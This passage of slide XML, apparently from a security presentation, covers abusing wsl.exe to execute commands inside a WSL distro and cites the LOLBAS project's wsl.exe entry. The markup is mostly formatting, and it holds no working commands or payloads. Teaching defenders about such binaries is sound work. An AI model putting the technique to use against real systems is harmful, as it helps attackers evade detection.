                          <a:latin typeface="JetBrains Mono"/>
                          <a:ea typeface="JetBrains Mono"/>
                          <a:cs typeface="JetBrains Mono"/>
                          <a:sym typeface="JetBrains Mono"/>
                        </a:rPr>
                        <a:t>Execute command inside WSL distro</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="JetBrains Mono"/>
                        <a:ea typeface="JetBrains Mono"/>
                        <a:cs typeface="JetBrains Mono"/>
                        <a:sym typeface="JetBrains Mono"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnL cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="28575">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="dash"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="3667600"/>
            <a:ext cx="7239000" cy="8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1700">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>further reference:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pl" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>update wsl.exe description by unrooted · PR #378 · LOLBAS-Project/LOLBAS</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Mono"/>
              <a:ea typeface="JetBrains Mono"/>
              <a:cs typeface="JetBrains Mono"/>
              <a:sym typeface="JetBrains Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Mono"/>
                <a:ea typeface="JetBrains Mono"/>
                <a:cs typeface="JetBrains Mono"/>
                <a:sym typeface="JetBrains Mono"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Wsl | LOLBAS</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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